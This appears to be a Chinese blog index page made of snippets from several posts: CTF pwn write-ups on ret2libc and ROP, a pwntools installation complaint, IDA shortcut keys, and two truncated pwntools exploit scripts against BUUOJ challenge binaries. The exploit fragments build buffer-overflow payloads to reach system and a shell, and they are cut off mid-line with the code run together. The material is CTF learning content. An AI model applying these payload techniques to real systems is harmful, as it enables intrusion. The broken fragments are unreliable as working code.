qq_53809201的博客

经过在ida中搜索,发现既没有system函数也没有bin/sh字符串,所以要想办法泄露出libc函数的地址来得到libc版本,找到system函数和bin/sh地址偏移.发现main函数中调用了两个函数。在第二个调用函数中发现了溢出点.

因为要写pwn题，所以准备安装pwntools工具，于是搜了几篇博文，着手安装，但是大多数博文都不太详细，而且有的非常混乱，更严重的是出现了少许错误，导致我安装了整整半天时间，也没安好，因为我是在虚拟机上安装的，最后的结果是把Ubuntu系统删除，重新搭建虚拟机，一切重新开始，好在最后终于安装成功了，所以想写一篇博文，记录以下自己的安装过程。

1.pwn1from pwn import *log_level = 'debug'elf = ELF("./pwn1")local = 0if local: r = process("./pwn1")else: r = remote("node4.buuoj.cn",29317)bin_sh = 0x000000000040118Asystem_addr = 0x0000000000401191payload = b'a'*0x0F + p64(system_addr) +

a: 将数据转换为字符串d: 将代码转换成数据c: 将数据转换为代码esc:回退键,能够倒回上一步操作的视图(只有在反汇编窗口才是这个作用,如果是在其他窗口按下esc,会关闭该窗口)shift+f12:可以打开string窗口,一键找出所有的字符串,右击setup,还能对窗口的属性进行设置ctrl+w: 保存ida数据库ctrl+s:选择某个数据段,直接进行跳转ctrl+鼠标滚轮: 能够调节流程试图的大小x: 对着某个函数\变量按该快捷键,可以查看它的交叉引用g: 直接跳转到某个地址n.

checksecrunida在程序中搜索既没有system又没有bin/sh,所以明显的ropnptr处可以使用整数溢出构造rop然后可以利用printf函数来泄露程序的libc版本覆盖返回地址执行system来getshellexpfrom pwn import *from LibcSearcher import *context(os = 'linux', arch = 'i386', log_level = 'debug')elf = ELF("./pwn2")loca